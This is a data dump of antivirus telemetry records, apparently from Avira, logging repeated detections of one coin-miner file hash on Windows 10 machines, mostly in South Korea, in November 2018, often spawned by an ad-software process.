  Row(detection=Row(filename='avscan-20181104-221911-af52b7a1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-214003-0813A641\\AVSCAN-20181104-221911-AF52B7A1', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T13:19:14Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp001f8e8e', filepath='C:\\Windows\\Temp\\tmp0000038e\\tmp001f8e8e', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Digitalonnet\\AD-Spider\\ADSpiderEngineNT.exe', parentsize=349080, timestamp='2018-11-04T12:32:48Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp001f8c46', filepath='C:\\Windows\\Temp\\tmp0000038e\\tmp001f8c46', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Digitalonnet\\AD-Spider\\ADSpiderEngineNT.exe', parentsize=349080, timestamp='2018-11-04T12:32:03Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp001f8dea', filepath='C:\\Windows\\Temp\\tmp0000038e\\tmp001f8dea', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Digitalonnet\\AD-Spider\\ADSpiderEngineNT.exe', parentsize=349080, timestamp='2018-11-04T12:32:35Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp001f8ac3', filepath='C:\\Windows\\Temp\\tmp0000038e\\tmp001f8ac3', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Digitalonnet\\AD-Spider\\ADSpiderEngineNT.exe', parentsize=349080, timestamp='2018-11-04T12:31:35Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-221402-77abd22d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-214003-0813A641\\AVSCAN-20181104-221402-77ABD22D', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T13:14:05Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp001f8906', filepath='C:\\Windows\\Temp\\tmp0000038e\\tmp001f8906', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Digitalonnet\\AD-Spider\\ADSpiderEngineNT.exe', parentsize=349080, timestamp='2018-11-04T12:31:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-210339-7ea575ff', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-204551-BE17A931\\AVSCAN-20181104-210339-7EA575FF', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:03:42Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-152100-db4f77d1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c27e850b\\AVSCAN-20181104-151832-5D3339BF\\AVSCAN-20181104-152100-DB4F77D1', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T13:21:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-214234-2375a89e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-214003-0813A641\\AVSCAN-20181104-214234-2375A89E', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:42:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-221422-7b2d48a7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-214003-0813A641\\AVSCAN-20181104-221422-7B2D48A7', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T13:14:25Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp001f8d3e', filepath='C:\\Windows\\Temp\\tmp0000038e\\tmp001f8d3e', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Digitalonnet\\AD-Spider\\ADSpiderEngineNT.exe', parentsize=349080, timestamp='2018-11-04T12:32:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp001f8dce', filepath='C:\\Windows\\Temp\\tmp0000038e\\tmp001f8dce', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Digitalonnet\\AD-Spider\\ADSpiderEngineNT.exe', parentsize=349080, timestamp='2018-11-04T12:32:32Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-204638-c6965702', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-204551-BE17A931\\AVSCAN-20181104-204638-C6965702', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T11:46:41Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0015d690', filepath='C:\\Windows\\Temp\\tmp0000038e\\tmp0015d690', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Digitalonnet\\AD-Spider\\ADSpiderEngineNT.exe', parentsize=349080, timestamp='2018-11-04T11:43:33Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0015d4bf', filepath='C:\\Windows\\Temp\\tmp0000038e\\tmp0015d4bf', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Digitalonnet\\AD-Spider\\ADSpiderEngineNT.exe', parentsize=349080, timestamp='2018-11-04T11:43:01Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-215118-81cca21c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-214003-0813A641\\AVSCAN-20181104-215118-81CCA21C', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:51:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-205147-fe49902b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-204551-BE17A931\\AVSCAN-20181104-205147-FE49902B', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T11:51:50Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-220111-ecab7156', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-214003-0813A641\\AVSCAN-20181104-220111-ECAB7156', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T13:01:14Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0015dba7', filepath='C:\\Windows\\Temp\\tmp0000038e\\tmp0015dba7', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Digitalonnet\\AD-Spider\\ADSpiderEngineNT.exe', parentsize=349080, timestamp='2018-11-04T11:45:03Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-220004-e094556d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-214003-0813A641\\AVSCAN-20181104-220004-E094556D', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T13:00:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-212756-853140c8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-204551-BE17A931\\AVSCAN-20181104-212756-853140C8', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:27:59Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp001f8f6c', filepath='C:\\Windows\\Temp\\tmp0000038e\\tmp001f8f6c', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Digitalonnet\\AD-Spider\\ADSpiderEngineNT.exe', parentsize=349080, timestamp='2018-11-04T12:33:06Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-204740-d1d0fbd0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-204551-BE17A931\\AVSCAN-20181104-204740-D1D0FBD0', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T11:47:43Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-215808-cba352ee', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-214003-0813A641\\AVSCAN-20181104-215808-CBA352EE', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:58:11Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0015dbbc', filepath='C:\\Windows\\Temp\\tmp0000038e\\tmp0015dbbc', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Digitalonnet\\AD-Spider\\ADSpiderEngineNT.exe', parentsize=349080, timestamp='2018-11-04T11:45:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-212152-4385196c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-204551-BE17A931\\AVSCAN-20181104-212152-4385196C', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:21:55Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-221045-54247709', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-214003-0813A641\\AVSCAN-20181104-221045-54247709', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T13:10:48Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-214818-6153d36d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-214003-0813A641\\AVSCAN-20181104-214818-6153D36D', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:48:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-200808-26566f29', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-200336-F55350DA\\AVSCAN-20181104-200808-26566F29', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T11:08:11Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-210701-a300dac2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-204551-BE17A931\\AVSCAN-20181104-210701-A300DAC2', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:07:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-220959-4bd04c97', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-214003-0813A641\\AVSCAN-20181104-220959-4BD04C97', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T13:10:02Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0015d446', filepath='C:\\Windows\\Temp\\tmp0000038e\\tmp0015d446', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Digitalonnet\\AD-Spider\\ADSpiderEngineNT.exe', parentsize=349080, timestamp='2018-11-04T11:42:53Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0015d42a', filepath='C:\\Windows\\Temp\\tmp0000038e\\tmp0015d42a', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Digitalonnet\\AD-Spider\\ADSpiderEngineNT.exe', parentsize=349080, timestamp='2018-11-04T11:42:51Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp001f8fa5', filepath='C:\\Windows\\Temp\\tmp0000038e\\tmp001f8fa5', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Digitalonnet\\AD-Spider\\ADSpiderEngineNT.exe', parentsize=349080, timestamp='2018-11-04T12:33:10Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0015d471', filepath='C:\\Windows\\Temp\\tmp0000038e\\tmp0015d471', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Digitalonnet\\AD-Spider\\ADSpiderEngineNT.exe', parentsize=349080, timestamp='2018-11-04T11:42:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp001f8f77', filepath='C:\\Windows\\Temp\\tmp0000038e\\tmp001f8f77', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Digitalonnet\\AD-Spider\\ADSpiderEngineNT.exe', parentsize=349080, timestamp='2018-11-04T12:33:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-204818-d88ce3f7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-204551-BE17A931\\AVSCAN-20181104-204818-D88CE3F7', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T11:48:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-215640-bbbd277d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-214003-0813A641\\AVSCAN-20181104-215640-BBBD277D', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:56:42Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0015db79', filepath='C:\\Windows\\Temp\\tmp0000038e\\tmp0015db79', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Digitalonnet\\AD-Spider\\ADSpiderEngineNT.exe', parentsize=349080, timestamp='2018-11-04T11:45:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-204824-d9c435e1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-204551-BE17A931\\AVSCAN-20181104-204824-D9C435E1', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T11:48:27Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0015d3a5', filepath='C:\\Windows\\Temp\\tmp0000038e\\tmp0015d3a5', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Digitalonnet\\AD-Spider\\ADSpiderEngineNT.exe', parentsize=349080, timestamp='2018-11-04T11:42:41Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-215345-9c5a65e6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-214003-0813A641\\AVSCAN-20181104-215345-9C5A65E6', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:53:48Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-205222-0497a8e8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-204551-BE17A931\\AVSCAN-20181104-205222-0497A8E8', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T11:52:25Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-214758-5dd75b5b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-214003-0813A641\\AVSCAN-20181104-214758-5DD75B5B', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:48:01Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-210944-c0648314', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-204551-BE17A931\\AVSCAN-20181104-210944-C0648314', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:09:47Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-204939-e73a1a36', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-204551-BE17A931\\AVSCAN-20181104-204939-E73A1A36', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T11:49:42Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-205818-44bc6be4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-204551-BE17A931\\AVSCAN-20181104-205818-44BC6BE4', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T11:58:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-220434-114a1859', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-214003-0813A641\\AVSCAN-20181104-220434-114A1859', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T13:04:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0015d47b', filepath='C:\\Windows\\Temp\\tmp0000038e\\tmp0015d47b', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Digitalonnet\\AD-Spider\\ADSpiderEngineNT.exe', parentsize=349080, timestamp='2018-11-04T11:42:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0015d32a', filepath='C:\\Windows\\Temp\\tmp0000038e\\tmp0015d32a', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Digitalonnet\\AD-Spider\\ADSpiderEngineNT.exe', parentsize=349080, timestamp='2018-11-04T11:42:33Z'), dt=datetime.date(2018, 11, 4)),
